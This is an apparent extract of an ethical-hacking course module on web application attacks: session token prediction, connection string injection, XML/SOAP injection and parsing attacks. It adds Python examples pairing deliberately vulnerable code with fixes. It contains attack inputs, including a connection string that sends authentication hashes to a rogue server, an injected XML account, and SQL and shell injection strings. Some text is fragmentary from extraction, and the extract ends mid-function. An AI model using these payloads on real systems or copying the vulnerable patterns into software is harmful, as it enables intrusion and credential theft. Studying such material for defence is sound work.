https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
When hex-encoding of an ASCII string user=jason;app=admin;date=23/11/201
session token by just changing date and use it for another transaction with server
Session Token Prediction
analyzing it for encoding (hex-encoding, Base64) or any pattern
Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session token
Attacking Session Token Generation Mechanism
Weak Encoding Example
https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
When hex-encoding of an ASCII string user=jason;app=admin;date=23/11/2010, the attacker can predict another session token by just changing the date and using it for another transaction with the server.
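The weak encoding above, decoded exactly as an attacker would, beside the two token designs that remove the weakness: an opaque random token with server-side state, and, where state must travel to the client, an HMAC over it. This is an added example and not part of the course material; the token is the one from the URL above, while the session store, the server key and the function names are constructed for the example.

```python
"""Weak session-token encoding (the page's example) and two fixes."""
import hashlib
import hmac
import secrets
import string
from urllib.parse import quote, unquote

# Token copied from the URL on the page (SessionToken=...).
PAGE_TOKEN = ("%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
              "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30")


def decode_token(token: str) -> dict:
    """Percent-decode and split 'k=v;k=v' into a dict: this is all an
    attacker has to do to read the token's fields."""
    fields = {}
    for part in unquote(token).split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key] = value
    return fields


def is_weak_token(token: str) -> bool:
    """Review check: a token that decodes to printable key=value text carries
    its state in the clear, so a client can edit a field and re-encode it."""
    plain = unquote(token)
    return all(ch in string.printable for ch in plain) and "=" in plain


# Fix 1: an opaque random token; all state stays server side.
SESSIONS = {}  # constructed in-memory session store: token -> state


def issue_opaque_token(state: dict) -> str:
    """256 bits from the OS CSPRNG; the token itself encodes nothing."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = dict(state)
    return token


def lookup(token: str):
    """Resolve a token to its state, or None if it was never issued."""
    return SESSIONS.get(token)


# Fix 2: if state must travel to the client, bind it with an HMAC so that
# changing any field (the 'date' trick above) invalidates the tag.
SERVER_KEY = secrets.token_bytes(32)  # constructed; a real service loads this from a KMS


def sign_state(fields: dict, key: bytes = SERVER_KEY) -> str:
    """Serialise the fields, percent-encode them and append an HMAC-SHA256 tag."""
    payload = ";".join(f"{k}={v}" for k, v in sorted(fields.items()))
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return quote(payload, safe="") + "." + tag


def verify_state(token: str, key: bytes = SERVER_KEY):
    """Return the fields if the tag matches, else None."""
    encoded, sep, tag = token.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, unquote(encoded).encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decode_token(encoded)


if __name__ == "__main__":
    print(decode_token(PAGE_TOKEN), "weak:", is_weak_token(PAGE_TOKEN))
    signed = sign_state(decode_token(PAGE_TOKEN))
    print("verified:", verify_state(signed))
    print("tampered:", verify_state(signed.replace("23%2F11%2F2010", "24%2F11%2F2010")))
```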
Session Token Prediction
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
■ Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the secure flag is not set, attackers can replay the cookie to gain unauthorized access to the application
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
Wireshark
Source: http://www.wireshark.org
Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
[Figure: methodology flow: Footprint Web Infrastructure, Analyze Web Applications, Attack Authorization Schemes, Perform Injection Attacks, Attack Web App Client]
Web App Hacking Methodology
Injection Attacks
… the interpreted language being used in order to break application's normal intended …
■ Web Scripts Injection: If user input is used into code that is dynamically … the server
■ SQL Injection: Enter a series of malicious SQL queries … the database
■ OS Commands Injection: Exploit operating systems by entering … utilize user input in a system-level command
■ LDAP Injection: Take advantage of non-validated web … filters to obtain direct access to databases
■ SMTP Injection: Inject arbitrary SMTP commands into … generate large volumes of spam email
■ XPath Injection: Enter malicious strings in input fields in … that it interferes with the application's logic
Note: For complete coverage of SQL Injection concepts and techniques refer to Module 14: SQL Injection
Injection Attacks
Web App Hacking Methodology
Attack Data Connectivity
■ Database connection strings are used … engines
■ Database connectivity attacks exploit … database instead of abusing database queries
Example of a common connection string used to connect to a Microsoft SQL Server database:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Data Connectivity Attacks
■ Connection String Injection
■ Connection String Parameter Pollution (CSPP) Attacks
■ Connection Pool DoS
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Connection String Injection
■ In a delegated authentication environment, the attacker injects parameters in a connection string by appending them with the semicolon (;) character
■ … is used to build connection strings based on user input
Before Injection
After Injection
■ When the connection string is populated, the Encryption value will be added to the previously configured set of parameters
Connection String Injection
A connection string injection attack can occur when dynamic string concatenation is used to build connection strings that are based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed by using a "last one wins" algorithm, and the hostile input is substituted for a legitimate value.
Before injection
Connection String Parameter Pollution (CSPP) Attacks
Hash Stealing
Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=; Data Source=RogueServer; Password=Integrated Security=true;
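The "last one wins" parsing described in the Connection String Injection notes, run over the hash-stealing string above, beside a builder that keeps user input from ever becoming a key. This is an added example and not part of the course material: the parser is a simplified model of the rule the notes describe, not the exact grammar of any particular database driver, and the builder function names and the sample inputs are constructed.

```python
"""Connection string injection: a 'last one wins' parser beside a safe builder."""

# The hash-stealing string from the page, as the application ends up sending it.
PAGE_HASH_STEALING = ("Data source=SQL2005; initial catalog=db1; integrated security=no; "
                      "user ID=; Data Source=RogueServer; Password=Integrated Security=true;")


def parse_connection_string(conn: str) -> dict:
    """Model of the rule the page describes: 'key=value;' pairs, keys
    case-insensitive, and the last occurrence of a key wins. A value may be
    wrapped in single or double quotes, in which case ';' inside it is data.
    (Simplified model, not the exact grammar of a specific driver.)"""
    result = {}
    i, n = 0, len(conn)
    while i < n:
        eq = conn.find("=", i)
        if eq == -1:
            break
        key = conn[i:eq].strip().lower()
        j = eq + 1
        while j < n and conn[j] == " ":
            j += 1
        if j < n and conn[j] in "'\"":
            end = conn.find(conn[j], j + 1)
            if end == -1:
                raise ValueError("unterminated quoted value")
            value = conn[j + 1:end]
            semi = conn.find(";", end)
        else:
            semi = conn.find(";", j)
            value = conn[j:semi if semi != -1 else n].strip()
        if key:
            result[key] = value  # a repeated key silently replaces the earlier one
        i = n if semi == -1 else semi + 1
    return result


def build_unsafe(server: str, database: str, user: str, password: str) -> str:
    """The vulnerable pattern: user input concatenated straight into the string."""
    return (f"Data source={server}; initial catalog={database}; integrated security=no; "
            f"user ID={user}; Password={password};")


def build_safe(server: str, database: str, user: str, password: str) -> str:
    """Hardened: every key is fixed by the application, every value is quoted so
    ';' and '=' inside it stay data, and quote characters are refused outright."""
    for name, value in (("user", user), ("password", password)):
        if "\"" in value or "'" in value:
            raise ValueError(f"{name} contains a quote character")
    pairs = [("Data Source", server), ("Initial Catalog", database),
             ("Integrated Security", "no"), ("User ID", user), ("Password", password)]
    return ";".join(f'{key}="{value}"' for key, value in pairs) + ";"


if __name__ == "__main__":
    # Constructed attacker inputs that reproduce the page's hash-stealing string.
    user, password = ";Data Source=RogueServer", "Integrated Security=true"
    print(parse_connection_string(build_unsafe("SQL2005", "db1", user, password)))
    print(parse_connection_string(build_safe("SQL2005", "db1", user, password)))
```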
Port Scanning
■ Attacker tries to connect to different ports by changing the value and seeing the error messages obtained.
Connection Pool DoS
… simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users
Example:
By default in ASP.NET, the maximum allowed connections in the pool is 100 and timeout is 30 seconds
… that no one else would be able to use the database-related parts of the application
Web App Hacking Methodology
Attack Web App Client
■ Attackers interact with the server-side applications in unexpected ways in order to perform malicious actions against the end users and access unauthorized data
Attack Web App Client
■ HTTP Header Injection
■ Frame Injection
■ Request Forgery Attacks
■ Session Fixation
■ Privacy Attacks
■ ActiveX Attacks
Web App Hacking Methodology
Attack Web Services
Attack Web Services
■ SOAP Injection
■ XML Injection
■ WSDL Probing Attacks
■ Information Leakage
■ Database Attacks
Web Services Probing Attacks
■ These attacks work similar to SQL injection attacks
■ Attacker uses these requests to include malicious contents in SOAP requests and analyzes errors to gain a deeper understanding of potential security weaknesses
Web Services Probing Attacks
In the first step, the attacker traps the WSDL document from web service traffic and analyzes it to determine the purpose of the application, functional breakdown, entry points, and message types. These attacks work similarly to SQL injection attacks. The attacker then creates a set of valid requests by selecting a set of operations, and formulating the request messages according to the rules of the XML Schema that can be submitted to the web service. The attacker uses these requests to include malicious content in SOAP requests and analyzes errors to gain a deeper understanding of potential security weaknesses.
FIGURE 13.53: Web Services Probing Attacks
■ Attacker injects malicious query strings in the user input field to bypass web services
Server Response
http://juggyboy.com/ws/products.asmx
Web Service Attacks: SOAP Injection
Server Response
http://juggyboy.com/ws/products.asmx
FIGURE 13.54: SOAP Injection
XML database with bogus entries
DoS attacks
Server Side Code
http://juggyboy.com/ws/login.asmx
… mark@certifiedhacker.com</mail></user>
Injected input, which creates a new user on the server:
<user>
<username>jason</username>
<password>attack</password>
<userid>105</userid>
<mail>jason@juggyboy.com</mail>
</user>
</users>
Web Service Attacks: XML Injection
The process in which the attacker enters values that query XML with values that take advantage of exploits is known as an XML injection attack. Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate an XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
Server Side Code
http://juggyboy.com/ws/login.asmx
[Figure: the server-side XML user store, an ISO-8859-1 <users> document holding <user> records with <username>, <password>, <userid> and <mail> elements (e.g. gandalf, userid 101, gandalf@middleearth.com), beside the Account Login form, with the injected input creating a new jason record]
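The registration path behind the login.asmx example above, written both in the vulnerable string-splicing form and in the hardened form that goes through the XML API, as an added example that is not part of the course material. The store layout mirrors the <users>/<user> records shown on the page, while the store contents, the injected mail value, the password placeholder and the function names are constructed for the example.

```python
"""XML injection into a user store, as in the login.asmx example, beside the fix."""
import xml.etree.ElementTree as ET

# Constructed store in the page's layout (the password value is a placeholder).
STORE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user><username>gandalf</username><password>PLACEHOLDER</password><userid>101</userid><mail>gandalf@middleearth.com</mail></user>
</users>"""

# Constructed registration input: the mail value closes the current record and
# opens a second <user> carrying its own userid, as the page describes.
INJECTED_MAIL = ("mark@certifiedhacker.com</mail></user>"
                 "<user><username>jason</username><password>attack</password>"
                 "<userid>105</userid><mail>jason@juggyboy.com")


def next_userid(store: bytes) -> int:
    """Server-assigned id: one above the highest id already stored."""
    ids = [int(u.findtext("userid")) for u in ET.fromstring(store).iter("user")]
    return max(ids, default=100) + 1


def add_user_unsafe(store: bytes, username: str, password: str, mail: str) -> bytes:
    """Vulnerable pattern: input is spliced into the document as markup, so
    '<' and '>' in it become elements the server later trusts."""
    record = (f"<user><username>{username}</username><password>{password}</password>"
              f"<userid>{next_userid(store)}</userid><mail>{mail}</mail></user>\n")
    return store.replace(b"</users>", record.encode("latin-1") + b"</users>")


def add_user_safe(store: bytes, username: str, password: str, mail: str) -> bytes:
    """Hardened: the record is built through the XML API, which escapes '<',
    '>' and '&', so the same input is stored as text inside one <mail> element.
    (Rejecting markup characters at input validation is a second, cheaper layer.)"""
    root = ET.fromstring(store)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", str(next_userid(store))), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="ISO-8859-1")


def list_users(store: bytes) -> list:
    """What the server now believes: (username, userid, mail) per record."""
    return [(u.findtext("username"), u.findtext("userid"), u.findtext("mail"))
            for u in ET.fromstring(store).iter("user")]


if __name__ == "__main__":
    print("unsafe:", [(u, i) for u, i, _ in list_users(add_user_unsafe(STORE, "mark", "secret", INJECTED_MAIL))])
    print("safe:  ", [(u, i) for u, i, _ in list_users(add_user_safe(STORE, "mark", "secret", INJECTED_MAIL))])
```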
Web Services Parsing Attacks
… parser to create a denial-of-service attack or generate logical errors in web service request processing
■ Recursive Payloads: Attacker queries for web services with a grammatically correct SOAP document that contains infinite processing loops resulting in exhaustion of XML parser and CPU resources
■ Oversize Payloads: Attackers send a payload that is excessively large to consume all system resources rendering web services inaccessible to other legitimate users
Web Services Parsing Attacks
Recursive Payloads
Oversize Payloads
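A streaming guard that rejects the recursive and oversize payloads described above before they reach the service's real parser, as an added example that is not part of the course material. The size, depth and element limits, the SOAP envelope helper and the sample requests are constructed; a real service sets the limits just above its largest legitimate message.

```python
"""Size and depth guard against recursive and oversize SOAP payloads."""
import io
import xml.etree.ElementTree as ET

# Constructed limits; tune them to the largest legitimate message the service handles.
MAX_BYTES = 64 * 1024
MAX_DEPTH = 32
MAX_ELEMENTS = 10_000


class PayloadRejected(ValueError):
    """Raised before the request reaches the service's real parser."""


def check_soap_payload(body: bytes) -> dict:
    """Stream the document and stop at the first limit violated, so a deeply
    nested or bloated payload is rejected while being read rather than after
    the parser has built the whole tree. Returns statistics when accepted."""
    if len(body) > MAX_BYTES:
        raise PayloadRejected(f"body of {len(body)} bytes exceeds {MAX_BYTES}")
    if b"<!DOCTYPE" in body:
        # SOAP messages must not carry a DTD; refusing one also shuts out
        # entity-expansion payloads. (Crude byte match, deliberately strict.)
        raise PayloadRejected("document type declaration not allowed in SOAP")
    depth = max_depth = elements = 0
    try:
        for event, _ in ET.iterparse(io.BytesIO(body), events=("start", "end")):
            if event == "start":
                depth += 1
                elements += 1
                max_depth = max(max_depth, depth)
                if depth > MAX_DEPTH:
                    raise PayloadRejected(f"nesting deeper than {MAX_DEPTH} elements")
                if elements > MAX_ELEMENTS:
                    raise PayloadRejected(f"more than {MAX_ELEMENTS} elements")
            else:
                depth -= 1
    except ET.ParseError as exc:
        raise PayloadRejected(f"malformed XML: {exc}") from exc
    return {"bytes": len(body), "max_depth": max_depth, "elements": elements}


SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


def envelope(body_xml: str) -> bytes:
    """Constructed helper: wrap a body fragment in a SOAP 1.1 envelope."""
    return (f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>{body_xml}'
            "</soap:Body></soap:Envelope>").encode()


def nested_request(levels: int) -> bytes:
    """Constructed recursive payload: `levels` elements nested inside each other."""
    return envelope("<a>" * levels + "</a>" * levels)


# Constructed legitimate request: Envelope > Body > GetProduct > id.
LEGIT_REQUEST = envelope('<GetProduct xmlns="urn:example:products"><id>7</id></GetProduct>')


if __name__ == "__main__":
    print("accepted:", check_soap_payload(LEGIT_REQUEST))
    for sample in (nested_request(500), b"<a>" + b" " * MAX_BYTES + b"</a>"):
        try:
            check_soap_payload(sample)
        except PayloadRejected as exc:
            print("rejected:", exc)
```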
Web Service Attack Tool: soapUI
■ soapUI is an open source functional testing tool, mainly used for web service testing
■ It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC
■ Attacker can use this tool to carry out web services probing, SOAP injection, XML injection, and web services parsing attacks
Web Service Attack Tool: XMLSpy
Source: http://www.altova.com
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies
[Figure: Altova XMLSpy screenshot of an XSLT debugging session, showing the XSL output, call stack and variables panes]
Module Flow
■ Web App Concepts
■ Web App Threats
■ Hacking Methodology
■ Web App Pen Testing
■ Security Tools
■ Countermeasures
Source: http://www.portswigger.net
■ The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values
[Figure: Foundstone CookieDigger screenshot listing the URLs it collected]
http://www.mcafee.com
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p lic a tio n H a c k in g T o o l: C o o k ie D ig g e r
S o u rc e : h ttp ://w w w .m c a fe e .c o m
C o o k ie D ig g e r is a to o l th a t d e te c ts v u ln e r a b le c o o k ie g e n e r a tio n and th e in s e c u re
im p le m e n ta tio n o f se ssio n m a n a g e m e n t by w e b a p p lic a tio n s . T his to o l is b a se d o n th e
c o lle c tio n a n d e v a lu a tio n o f c o o k ie s b y a w e b a p p lic a tio n used b y m a n y users.
C e r ta in ty a n d e n tr o p y o f th e c o o k ie a re fa c to rs o n w h ic h th e to o l re lie s . T h e c o o k ie v a lu e s
c o n ta in v a lu a b le in fo r m a tio n su ch as th e lo g in d e ta ils o f th e u s e r (u s e r n a m e a n d p a s s w o rd ).
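The two measurements described above can be reproduced in a few lines. The script below is an added example and is not part of the original module or of the CookieDigger tool: it takes a set of cookies issued in sequence, computes the Shannon entropy of each character position across the samples, checks whether the trailing number increments by a constant, and looks for a known user name in clear or base64 form. The cookie values and the user name "jason" are constructed for the demonstration.

```python
import base64
import math
import re
from collections import Counter

# Constructed samples (not real captured data): cookies a hypothetical
# application issued to one test user in quick succession.
WEAK_COOKIES = [
    "PHPSESSID=jason:1700000001:0001",
    "PHPSESSID=jason:1700000002:0002",
    "PHPSESSID=jason:1700000003:0003",
    "PHPSESSID=jason:1700000004:0004",
]
STRONG_COOKIES = [
    "PHPSESSID=f3a9c2e17b04d8e65a1c9f0b2d7e4a16",
    "PHPSESSID=0b7d4e2a9c61f8a3d5e0b2c4f7a19d63",
    "PHPSESSID=9e1c7a3f5b2d8046c3a1e7f9b0d5c2a8",
    "PHPSESSID=62d0f4b8a7c1e395d8b2a0c6f1e7d3b4",
]


def shannon_entropy(symbols):
    """Shannon entropy in bits of one character position across all samples."""
    counts = Counter(symbols)
    n = len(symbols)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_sequential(values):
    """True if every value ends in a number and consecutive values differ by a constant."""
    tails = [re.search(r"(\d+)$", v) for v in values]
    if not all(tails):
        return False
    nums = [int(m.group(1)) for m in tails]
    diffs = {b - a for a, b in zip(nums, nums[1:])}
    return len(diffs) == 1 and diffs.pop() != 0


def analyse(cookies, known_secrets):
    """Rate a set of Set-Cookie values for predictability and information leakage."""
    values = [c.split("=", 1)[1] for c in cookies]
    width = min(len(v) for v in values)
    per_position = [shannon_entropy([v[i] for v in values]) for i in range(width)]
    leaks = []
    for secret in known_secrets:
        b64 = base64.b64encode(secret.encode()).decode()
        if any(secret.lower() in v.lower() or b64 in v for v in values):
            leaks.append(secret)
    return {
        "samples": len(values),
        "value_length": width,
        "constant_positions": sum(1 for e in per_position if e == 0.0),
        "total_entropy_bits": sum(per_position),
        "sequential": looks_sequential(values),
        "leaks": leaks,
    }


if __name__ == "__main__":
    for label, cookies in (("weak", WEAK_COOKIES), ("strong", STRONG_COOKIES)):
        print(label, analyse(cookies, ["jason"]))
```

With four samples the per-position entropy tops out at 2 bits, so the absolute numbers only become meaningful with hundreds of cookies; what matters is the pattern: the weak set has 19 of 21 positions fixed, a constant increment, and the user name in clear, while the strong set varies in every position and carries nothing recognisable.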
Web Application Hacking Tool: WebScarab
Source: http://www.owasp.org
WebScarab allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. (The screenshot shows the WebScarab Summary tab with a tree of intercepted conversations for http://www.owasp.org:80/, next to the Message log, Proxy, Manual Request, Web Services, Spider, Extensions, Session ID Analysis, Scripted, Fragments and Compare tabs.)
Web Application Hacking Tools
- Instant Source available at http://www.blazingtools.com
- HttpBee available at http://www.oOo.nu
- w3af available at http://w3af.sourceforge.net
- Teleport Pro available at http://www.tenmax.com
- GNU Wget available at http://gnuwin32.sourceforge.net
- WebCopier available at http://www.maximumsoft.com
- BlackWidow available at http://softbytelabs.com
- HTTrack available at http://www.httrack.com
- cURL available at http://curl.haxx.se
- MileSCAN ParosPro available at http://www.milescan.com
Encoding Schemes
The HTTP protocol and the HTML language are the two major components of web applications. Both components are text based. Web applications employ encoding schemes to ensure that both components handle unusual characters and binary data safely. The same schemes are what an attacker manipulates to carry hostile input past a filter that only inspects the raw, undecoded form, so a defender must decode input the same way the application will before inspecting it. The encoding schemes include:
- URL Encoding: an unusual character is replaced by the % prefix followed by the two hexadecimal digits of its byte value, for example %3d (=), %0a (newline), %20 (space).
- HTML Encoding: an HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document.
- Unicode Encoding: UTF-8 is a variable-length encoding standard in which each byte of a character is expressed in hexadecimal and preceded by the % prefix, for example %c2%a9 (©) and %e2%89%a0 (≠).
- Base64 Encoding and Hex Encoding: binary data represented as printable characters, or as a string of hexadecimal digits. Example: Jason 123B684AD9
Table 13.2: Encoding Schemes Table
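The table above lists the schemes; the script below, an added example that is not part of the original module, produces the same input in each of them and, more usefully for a tester, peels nested encodings back off. A filter that inspects only the raw request sees "%253Cscript%253E" or "&#x25;3Cscript&#x25;3E", while a component that decodes twice sees "<script>"; the normalize() function decodes URL, %uXXXX and HTML-entity layers until the string stops changing, which is what a filter has to do before it compares anything. The sample strings are constructed.

```python
import base64
import html
import re
import urllib.parse


def html_entity_encode(text):
    """Replace every non-alphanumeric character with a decimal HTML character reference."""
    return "".join(ch if ch.isalnum() else f"&#{ord(ch)};" for ch in text)


def encode_all(text):
    """The same string in each scheme the table lists."""
    raw = text.encode("utf-8")
    return {
        "url": urllib.parse.quote(text, safe=""),
        "html_entity": html_entity_encode(text),
        "utf8_percent": "".join(f"%{b:02x}" for b in raw),
        "base64": base64.b64encode(raw).decode("ascii"),
        "hex": raw.hex(),
    }


_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def normalize(text, max_rounds=5):
    """Peel nested URL, %uXXXX and HTML-entity encodings until the string stops changing.

    A string that is still changing after max_rounds is treated as hostile
    rather than passed through half-decoded.
    """
    for _ in range(max_rounds):
        decoded = html.unescape(text)
        decoded = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        decoded = urllib.parse.unquote(decoded)
        if decoded == text:
            return decoded
        text = decoded
    raise ValueError("input still changing after %d decode rounds" % max_rounds)


if __name__ == "__main__":
    for scheme, value in encode_all("<script>").items():
        print(f"{scheme:13} {value}")
    for sample in ("%253Cscript%253E", "&#x25;3Cscript&#x25;3E", "%u003Cscript%u003E"):
        print(f"{sample:24} -> {normalize(sample)}")
```

The order inside one round (entities first, then %uXXXX, then %XX) mirrors how a browser-facing application typically layers the decodings; an application with a different order can be bypassed with input that only decodes cleanly in that order, so the normalizer should match the target, not the other way round.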
How to Defend Against SQL Injection Attacks
To defend against SQL injection attacks, unchecked user input must never be allowed to pass into database queries. Every user-supplied value passed to the database should be validated and sanitized: check it against the expected data type, length and pattern, and pass it to the query as a bound parameter of a prepared statement or stored procedure rather than quoting it into the query text by hand. Hand-quoting is fragile because the value stays inside the SQL grammar; parameter binding keeps it out entirely.
- Validate and sanitize user inputs passed to the database
- Limit the length of user input
- Use custom error messages so that database errors are never echoed to the client
- Monitor DB traffic using an IDS or WAF
- Disable commands like xp_cmdshell, and move extended stored procedures to an isolated server
- Isolate the database server and the web server
- Use the POST method for forms that carry user data (this keeps values out of URLs and logs, but is not by itself a defense against injection)
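The difference between quoting and binding is easiest to see side by side. The script below is an added example, not code from the original module: it builds an in-memory SQLite database with two constructed user rows and runs the same login query three ways. The vulnerable version formats the user name into the SQL text, so the input jason' -- closes the quote and comments out the password check; the parameterized version binds the same input and finds no row; the hardened version adds the allowlist validation, length limit and generic error path the list above calls for. The user names and password hashes are placeholders.

```python
import re
import sqlite3

# Allowlist for a login name: type (text), pattern and length checked in one place.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def make_db():
    """In-memory database with two constructed user rows (hashes are placeholders)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("jason", "hash-of-jasons-password"), ("alice", "hash-of-alices-password")],
    )
    return conn


def login_vulnerable(conn, username, password_hash):
    """Deliberately broken: user input is quoted straight into the SQL text."""
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password_hash = '{password_hash}'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn, username, password_hash):
    """Bound parameters: the driver sends the values separately from the SQL grammar."""
    return conn.execute(
        "SELECT id FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()


def login_hardened(conn, username, password_hash):
    """Allowlist validation, then bound parameters, then a generic failure path."""
    if not USERNAME_RE.fullmatch(username):
        return None  # rejected before the value ever reaches the database
    try:
        return login_parameterized(conn, username, password_hash)
    except sqlite3.Error:
        # Record the real error server-side; the client only sees a generic failure.
        return None


if __name__ == "__main__":
    db = make_db()
    attack = "jason' --"
    print("vulnerable   :", login_vulnerable(db, attack, "wrong"))
    print("parameterized:", login_parameterized(db, attack, "wrong"))
    print("hardened     :", login_hardened(db, attack, "wrong"))
```

SQLite has no account model, so the least-privilege item (connect as an account that can only SELECT from the tables the application needs) cannot be shown here; on SQL Server, MySQL or PostgreSQL it is a GRANT on the connecting role and is what limits the damage when a query is injected despite everything else.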
How to Defend Against Command Injection Flaws
The simplest way to protect against command injection flaws is to avoid shell commands wherever possible. Most languages provide libraries that perform the same functions as common shell commands and system calls; these libraries do not invoke the operating system's shell interpreter, and so avoid most shell command problems. For those calls that must still be made, such as calls to backend databases, the data must be carefully validated to ensure that it does not contain malicious content. Structure such requests so that every supplied parameter is treated as data rather than as potentially executable content: passing an argument vector directly to the process (with no shell in between), using stored procedures with parameters, or using prepared statements provides significant protection because the supplied input cannot change the command being run. This reduces, but does not completely eliminate, the risk in these external calls, so the input should still be validated against an allowlist. Least-privileged accounts must be used to access the database, and to run the process that issues the calls, so that a successful injection has the smallest possible reach.
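The "no shell in between" point can be demonstrated directly. The script below is an added example, not code from the original module; it uses the Python interpreter itself, run with -c so that it prints its first argument, as a stand-in for a command such as ping, so it runs anywhere without network access. The vulnerable version builds a command string and hands it to /bin/sh, so the input x; echo INJECTED runs a second command; the argv version passes the same input as one argument and the OS receives it literally; the safe version additionally validates the host against an allowlist (an IP literal or a DNS name) before the call. The host values are constructed.

```python
import ipaddress
import re
import subprocess
import sys

# Stand-in for an external command such as ping: prints its first argument, so the
# output shows exactly what the operating system received.
ECHO_ARG = "import sys; print(sys.argv[1])"

HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def validate_host(host):
    """Allowlist: an IP address literal or a DNS hostname; anything else is rejected."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"invalid host: {host!r}")
    return host


def run_vulnerable(host):
    """Deliberately broken: the string goes to /bin/sh, so ';' starts a second command."""
    cmd = f'{sys.executable} -c "{ECHO_ARG}" {host}'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(host):
    """No shell: host is one argv element, so shell metacharacters are just characters."""
    return subprocess.run(
        [sys.executable, "-c", ECHO_ARG, host], capture_output=True, text=True
    ).stdout


def run_safe(host):
    """Validate first, then call without a shell."""
    return run_argv(validate_host(host))


if __name__ == "__main__":
    hostile = "x; echo INJECTED"
    print("vulnerable:", repr(run_vulnerable(hostile)))
    print("argv only :", repr(run_argv(hostile)))
    print("safe      :", repr(run_safe("8.8.8.8")))
```

Note that run_argv alone already prevents the injection; the validation in run_safe is the second layer the text recommends, and it matters for commands that interpret their own arguments (an argument starting with "-" is read as an option by most tools, which argv passing does nothing to prevent).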
How to Defend Against XSS Attacks
The following are the defensive techniques to prevent XSS attacks:
- Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all other parameters against a rigorous specification.
- Implement a stringent security policy.
- Filter the script output to defeat XSS vulnerabilities, which prevents hostile script from being transmitted to users; converting all non-alphanumeric characters to HTML character entities before they are written into a page is the standard way to do this.
- Use a web application firewall to block attack traffic, and consider signing scripts with private and public keys so that only trusted scripts are run.
- The entire code of the website has to be reviewed if it has to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas should be checked as follows: the headers, as well as
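The output-filtering item is the one that is implemented in code, and it is context dependent. The following is an added example, not code from the original module: it encodes untrusted values for an HTML body or attribute (every non-alphanumeric character becomes a character reference, as the slide recommends), encodes separately for a JavaScript string literal, and shows the one place encoding is not enough: a URL attribute, where javascript:alert(1) survives entity encoding intact and the scheme has to be validated instead. The display name and URLs are constructed inputs.

```python
import html
from urllib.parse import urlsplit


def encode_for_html(text):
    """Output encoding for HTML body and quoted-attribute contexts:
    every non-alphanumeric character becomes a decimal character reference."""
    return "".join(ch if ch.isalnum() else f"&#{ord(ch)};" for ch in text)


def encode_for_js_string(text):
    """Output encoding for a value placed inside a JavaScript string literal."""
    out = []
    for ch in text:
        code = ord(ch)
        if ch.isalnum() and code < 128:
            out.append(ch)
        elif code < 256:
            out.append(f"\\x{code:02x}")
        else:
            out.append(f"\\u{code:04x}")
    return "".join(out)


def safe_url(url):
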